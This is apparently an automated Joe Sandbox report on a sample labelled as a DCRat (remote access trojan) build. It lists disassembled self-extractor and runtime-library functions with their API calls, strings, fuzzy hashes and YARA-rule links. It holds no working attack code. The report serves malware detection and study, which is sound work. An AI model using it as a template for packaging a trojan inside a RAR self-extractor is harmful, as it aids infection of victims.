Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: a48c0b819cf74cf876db701239bd66efc0960e178493078c3c36032a057c8d90
Instruction ID: 97f26a861172c45da7036893b8422b97688e7eabe80082010a29aee64089caa8
Opcode Fuzzy Hash: a48c0b819cf74cf876db701239bd66efc0960e178493078c3c36032a057c8d90
Instruction Fuzzy Hash: 81F11871E043809BDB25EF248495BFE77DA6F90300F08856DFD8D9B283CB689945876A

Function 00089CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00089D0A

Strings

<style>, xrefs: 00089E30
</p>, xrefs: 00089DE8
<br>, xrefs: 00089DFE
>, xrefs: 00089D4B
</style>, xrefs: 00089E52

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: b406ed7dcacb683d42473e7f21b3a580f0183654260079d3c7b913baaf9a0a76
Instruction ID: c35f63b83c5385c542b1aaf8abbe1a9b6b8d6c244cdb1e698400dc249e5e760b
Opcode Fuzzy Hash: b406ed7dcacb683d42473e7f21b3a580f0183654260079d3c7b913baaf9a0a76
Instruction Fuzzy Hash: CD51592674032395DB70BA659C117B673E4FFA1790F6D042AFEC19B2C1FBA58C818369

Function 0009F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0009FE02,00000000,00000000,00000000,00000000,00000000,0009529F), ref: 0009F6CF
__fassign.LIBCMT ref: 0009F74A
__fassign.LIBCMT ref: 0009F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0009F78B
WriteFile.KERNEL32(?,00000000,00000000,0009FE02,00000000,?,?,?,?,?,?,?,?,?,0009FE02,00000000), ref: 0009F7AA
WriteFile.KERNEL32(?,00000000,00000001,0009FE02,00000000,?,?,?,?,?,?,?,?,?,0009FE02,00000000), ref: 0009F7E3

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c81f49f24a5f77a4f7317ecc87e32c9187cda5366280c0ee0b6c65058345d83b
Instruction ID: 53515826033e24a2a948f3e9a215f1609e46e843a5a8aa884e568df74fff6c53
Opcode Fuzzy Hash: c81f49f24a5f77a4f7317ecc87e32c9187cda5366280c0ee0b6c65058345d83b
Instruction Fuzzy Hash: 355173B590024AAFDF10CFA8DC45AFEFBF4EF09310F14416AE955E7251D670AA41CBA0

Function 0008CE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0008CE9D

Part of subcall function 0007B690: _wcslen.LIBCMT ref: 0007B696

_swprintf.LIBCMT ref: 0008CED1

Part of subcall function 00074092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000740A5

SetDlgItemTextW.USER32(?,00000066,000B946A), ref: 0008CEF1
_wcschr.LIBVCRUNTIME ref: 0008CF22
EndDialog.USER32(?,00000001), ref: 0008CFFE

Strings

%s%s%u, xrefs: 0008CEC6

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
String ID: %s%s%u
API String ID: 689974011-1360425832
Opcode ID: e51dd91f64358047d89b13ea0ac75d299230c92169f2a394d874cdb2da863799
Instruction ID: baca5288b6223809197d71a8c0a187eb3128675048f9d681a812638c42d58325
Opcode Fuzzy Hash: e51dd91f64358047d89b13ea0ac75d299230c92169f2a394d874cdb2da863799
Instruction Fuzzy Hash: 91415071900659AAEF61ABA0CC45EEE77FCEB05340F4081A6FA49E7052EB749A448F71

Function 00092900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00092937
___except_validate_context_record.LIBVCRUNTIME ref: 0009293F
_ValidateLocalCookies.LIBCMT ref: 000929C8
__IsNonwritableInCurrentImage.LIBCMT ref: 000929F3
_ValidateLocalCookies.LIBCMT ref: 00092A48

Strings

csm, xrefs: 000929DD

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c851b3b54b7c0ebfca28a7858c0bbd08df4693c0d46f7a9541d1158cb7bf59d6
Instruction ID: ba470b1bebe3cd4c9e29d68d82d72b526f41140f01f9b00a6cfa7b2e4664d2f3
Opcode Fuzzy Hash: c851b3b54b7c0ebfca28a7858c0bbd08df4693c0d46f7a9541d1158cb7bf59d6
Instruction Fuzzy Hash: 7541A034A00208AFCF10DF68C885A9EBBF5AF45324F148065E815AB393DB759A55DFA1

Function 00089ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00089EEE
GetWindowRect.USER32(?,00000000), ref: 00089F44
ShowWindow.USER32(?,00000005,00000000), ref: 00089FDB
SetWindowTextW.USER32(?,00000000), ref: 00089FE3
ShowWindow.USER32(00000000,00000005), ref: 00089FF9

Strings

RarHtmlClassName, xrefs: 00089FA5

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 255c18977735a09e8f07475372afd26a32697bf55b0aeb82e4e7c4aeaadfa100
Instruction ID: 73f979931debef7c7c55d0a60c8d97b8608ee97db4deb16a3c199835c2700ea2
Opcode Fuzzy Hash: 255c18977735a09e8f07475372afd26a32697bf55b0aeb82e4e7c4aeaadfa100
Instruction Fuzzy Hash: 8E41CE36105211EFEB617F649C48B6B7BE8FF48701F04452AFD899A152CB38D904DF62

Function 00089955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0008995E
_wcslen.LIBCMT ref: 00089993

Strings

, xrefs: 000899B0
 , xrefs: 00089A21
<br>, xrefs: 000899DF
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00089987

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: b496057cc68f8f09239232b530cab4d2ed22daacaab524695369e9f260ce5981
Instruction ID: 43e5868b32604ff93b3a3d4b47a22278ebf791167c6905b85c2b391b2a9ffdf0
Opcode Fuzzy Hash: b496057cc68f8f09239232b530cab4d2ed22daacaab524695369e9f260ce5981
Instruction Fuzzy Hash: 9C315E3664434596DA34BB949C42BBBB3E4FBD0320F54441EF4C25B2C1FBA0AD4093E2

Function 0009C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0009C868: _free.LIBCMT ref: 0009C891

_free.LIBCMT ref: 0009C8F2

Part of subcall function 00098DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0009C896,?,00000000,?,00000000,?,0009C8BD,?,00000007,?,?,0009CCBA,?), ref: 00098DE2
Part of subcall function 00098DCC: GetLastError.KERNEL32(?,?,0009C896,?,00000000,?,00000000,?,0009C8BD,?,00000007,?,?,0009CCBA,?,?), ref: 00098DF4

_free.LIBCMT ref: 0009C8FD
_free.LIBCMT ref: 0009C908
_free.LIBCMT ref: 0009C95C
_free.LIBCMT ref: 0009C967
_free.LIBCMT ref: 0009C972
_free.LIBCMT ref: 0009C97D

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 8d9edabcf2b8e9598057fbcaf98056f870ef80804a91cc26a5cf790acd7fdf77
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 92110A71981B04ABEE20BBB1CD07FCB7BACAF05B04F404C25B2DDA6193DE65A506E750

Function 0008E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0008E669,0008E5CC,0008E86D), ref: 0008E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0008E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0008E630

Strings

ReleaseSRWLockExclusive, xrefs: 0008E625
KERNEL32.DLL, xrefs: 0008E600
AcquireSRWLockExclusive, xrefs: 0008E615

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 5fa8361a7987853b355a72222129288b98f20aed858062c89cdd5bba19e46a8f
Instruction ID: 35144f405db22086261d4fd4188efc0b609031e49cd4781f5c1e6ac7ff5d9b92
Opcode Fuzzy Hash: 5fa8361a7987853b355a72222129288b98f20aed858062c89cdd5bba19e46a8f
Instruction Fuzzy Hash: 9BF0C231791AA2AB1B716EF4EC94AAA73C87B267C1304053AE981D7210FB18CC705BA0

Function 00098900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0009891E

Part of subcall function 00098DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0009C896,?,00000000,?,00000000,?,0009C8BD,?,00000007,?,?,0009CCBA,?), ref: 00098DE2
Part of subcall function 00098DCC: GetLastError.KERNEL32(?,?,0009C896,?,00000000,?,00000000,?,0009C8BD,?,00000007,?,?,0009CCBA,?,?), ref: 00098DF4

_free.LIBCMT ref: 00098930
_free.LIBCMT ref: 00098943
_free.LIBCMT ref: 00098954
_free.LIBCMT ref: 00098965

Strings

p, xrefs: 00098914

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: p
API String ID: 776569668-3461400186
Opcode ID: 64fcebe5b21550c7099bef5d5502c2efc5debec209a81e2315ce12447a95fa16
Instruction ID: 30db467f90c641f541ae25569c0ef5c1e0516f6058b473dcdcea274d4023e5b2
Opcode Fuzzy Hash: 64fcebe5b21550c7099bef5d5502c2efc5debec209a81e2315ce12447a95fa16
Instruction Fuzzy Hash: 1AF05E71913622ABEA46AF14FC024557FB1FB3A7203044507F854523B3CB3D8941EBA1

Function 0008146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 000814C2

Part of subcall function 0007B146: GetVersionExW.KERNEL32(?), ref: 0007B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000814E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00081500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00081513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00081523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00081533

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: d3aa2d22a32dbd4ce17975ee42774487bb2a50ae961feb0c01755f476ecbe7a7
Instruction ID: e73e732d4b98175962a2b4b18c63c955b4d78a3e426d0090e10f085b99c78f5d
Opcode Fuzzy Hash: d3aa2d22a32dbd4ce17975ee42774487bb2a50ae961feb0c01755f476ecbe7a7
Instruction Fuzzy Hash: 8031F775108346ABC704DFA8C88499BBBF8FF99714F005A1EF999C3210E734D649CBA6

Function 00092AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00092AF1,000902FC,0008FA34), ref: 00092B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00092B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00092B2F
SetLastError.KERNEL32(00000000,00092AF1,000902FC,0008FA34), ref: 00092B81

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f1b6428042f109643738aa84a3675fb4f67e52ada80a66b0ac7ae67972642324
Instruction ID: df458d10db15c11c56c77bbc39d6a212787e5f6b79aaea833ba00d0795ab3fa4
Opcode Fuzzy Hash: f1b6428042f109643738aa84a3675fb4f67e52ada80a66b0ac7ae67972642324
Instruction Fuzzy Hash: C001F73210EB117EBE682B74BCA5A6F2BD9EF43774B600739F110550E1EF154D00BA44

Function 000997E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,000B1098,00094674,000B1098,?,?,000940EF,?,?,000B1098), ref: 000997E9
_free.LIBCMT ref: 0009981C
_free.LIBCMT ref: 00099844
SetLastError.KERNEL32(00000000,?,000B1098), ref: 00099851
SetLastError.KERNEL32(00000000,?,000B1098), ref: 0009985D
_abort.LIBCMT ref: 00099863

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 79a56bbcd8ef1fa654d279a68da657d2e7c2fda8f6cf1eba6ce6b4f7a652220f
Instruction ID: a703d4961687c59de07136c75a05dd4032fa99c9acac365e5e720020b8fe96a0
Opcode Fuzzy Hash: 79a56bbcd8ef1fa654d279a68da657d2e7c2fda8f6cf1eba6ce6b4f7a652220f
Instruction Fuzzy Hash: D4F0C835144A0166DE66333CBC1AFAF2BA98FD3B71F25012CF62492293FE258806B565

Function 0008DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0008DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0008DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0008DC72
TranslateMessage.USER32(?), ref: 0008DC7C
DispatchMessageW.USER32(?), ref: 0008DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0008DC91

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: b0a1987376d09f36f4ebb8de602e480b8e00ebde040556acd0110af19bbc615e
Instruction ID: 779037c5c4b59d801b57374d765f11d477974a5410337b88f16fbd407c2f3220
Opcode Fuzzy Hash: b0a1987376d09f36f4ebb8de602e480b8e00ebde040556acd0110af19bbc615e
Instruction Fuzzy Hash: A9F04F72A0121ABBDB206BA5EC4CECF7FBDEF42791B004522F90AD2050D678D646C7B1

Function 0007C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 000805DA: _wcslen.LIBCMT ref: 000805E0

Part of subcall function 0007B92D: _wcsrchr.LIBVCRUNTIME ref: 0007B944

_wcslen.LIBCMT ref: 0007C197
_wcslen.LIBCMT ref: 0007C1DF

Strings

.exe, xrefs: 0007C10B
.rar, xrefs: 0007C0E1, 0007C134
.sfx, xrefs: 0007C11A

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 0a7e160a983847d05f7215448065a9547f2239f0253d52de18c0275360dbb7f0
Instruction ID: dab2bc4d4d1e1848d055385ff969ca9c1d6579c1277fd40fcee9844c7f22ddd5
Opcode Fuzzy Hash: 0a7e160a983847d05f7215448065a9547f2239f0253d52de18c0275360dbb7f0
Instruction Fuzzy Hash: 5041292294035195E771AF748812EBFB3E8FF42714F10851EF9C96B182EB689D86C3D9

Function 0007BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0007BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0007A275,?,?,00000800,?,0007A23A,?,0007755C), ref: 0007BBC5
_wcslen.LIBCMT ref: 0007BC3B

Strings

UNC, xrefs: 0007BBA7
\\?\, xrefs: 0007BB52, 0007BB99, 0007BBF7, 0007BC4E

Memory Dump Source

Source File: 00000003.00000002.2407325315.0000000000071000.00000020.00000001.01000000.00000006.sdmp, Offset: 00070000, based on PE: true

Associated: 00000003.00000002.2407302967.0000000000070000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407365534.00000000000A3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000AE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000B5000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407394029.00000000000D2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2407468012.00000000000D3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70000_DCRatBuild.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 63c90535fe970f2a0256702b1e4d45d742e9cebc677f3c856df6add2980d6b7c
Instruction ID: 2eaa19ddeb06f03da42ec09dbbbaac4059bb08c2b0d3396f42444cf72e77e69a
Opcode Fuzzy Hash: 63c90535fe970f2a0256702b1e4d45d742e9cebc677f3c856df6add2980d6b7c
Instruction Fuzzy Hash: F241B371800219AACF62AF60CC01FEF77A9BF41390F10C465F958A7152EB78EE948B64

Function 0008CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0008CD84

Part of subcall function 0008AF98: _wcschr.LIBVCRUNTIME ref: 0008B033

Part of subcall function 00081FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0007C116,00000000,.exe,?,?,00000800,?,?,?,00088E3C), ref: 00081FD1

Strings

MAX, xrefs: 0008CDD9
